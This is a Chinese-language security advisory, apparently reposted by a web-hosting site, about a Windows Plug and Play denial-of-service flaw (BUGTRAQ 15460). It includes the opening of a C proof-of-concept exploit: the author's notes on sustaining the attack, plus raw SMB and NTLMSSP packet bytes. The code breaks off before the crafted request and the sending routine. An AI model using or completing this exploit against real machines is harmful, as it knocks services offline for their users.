Microsoft Windows即插即用拒绝服务漏洞

发布日期：2005-11-16
更新日期：2005-11-16

受影响系统：

Microsoft Windows XP SP1
Microsoft Windows 2000SP4

描述：

---

BUGTRAQ ID: 15460

Microsoft Windows即插即用（PnP）允许操作系统在安装新硬件时能够检测到这些硬件。

Microsoft Windows即插即用服务中存在拒绝服务漏洞。如果攻击者能够向upnp_getdevicelist发送特制请求的话，就可能导致services.exe消耗过多的内存，直到耗尽目标机器的虚拟内存。

请注意这个漏洞与MS05-047中所述漏洞无关。

<*来源：Winny Thomas （winnymthomas@yahoo.com）

链接：http://www.microsoft.com/technet/security/advisory/911052.mspx
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/*
* Author: Winny Thomas
* Nevis Labs, Pune, INDIA
*
* Details:
* While working on the exploit for MS05-047 i came a cross a condition where
* a specially crafted request to upnp_getdevicelist would cause
* services.exe to consume memory to a point where the target machines virtual
* memory gets exhausted. This exploit is NOT similar to the MS05-047 exploit i
* published earlier. The earlier one trashed the EIP of the target causing a
* crash in services.exe and eventually brought down the system to shut down.
* However in this exploit (again a DOS) the virtual memory is consumed to a
* point where desktop requests (like clicking "My Computer"), HTTP requests,
* SMB requests etc does not get serviced for sometime. After sometime the
* memory usage comes down and the target system would work as normal. However
* this code when continuosly executed against a target leads to a sustained
* DOS attack.
* Start the task manager on the target system and run this code against the
* target and watch the virtual memory usage shoot up.
*
* I used windbg to break on calls to upnp_getdevicelist when running this code.
* However even before the break point is hit the system becomes unresponsive.
* Strangely though changing the operation number in the DCERPC request to
* something else other than 0xa (upnp_getdevicelist) will make the DOS attempt
* fail. Perhaps changing the payload a little bit, so that the underlying
* demarshalling routines dont return an error, might reproduce this effect
* for other UPNP operations as well.
*
* TESTED ON: Windows 2000 server SP0, SP2 and SP3. I have not tested this on
* any of the above machines with the recent hot fixes for UPNP.
*
* Note: This code is for educational/testing purposes by authorized persons on networks systems setup for such purposes
* The author shall bear no responsibility for any damage caused by using this code.
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

unsigned short ProcessID = 0;
unsigned short TID = 0;
unsigned short UserID = 0;
unsigned short FID = 0;

char peer0_0[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00" ;

char peer0_1[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!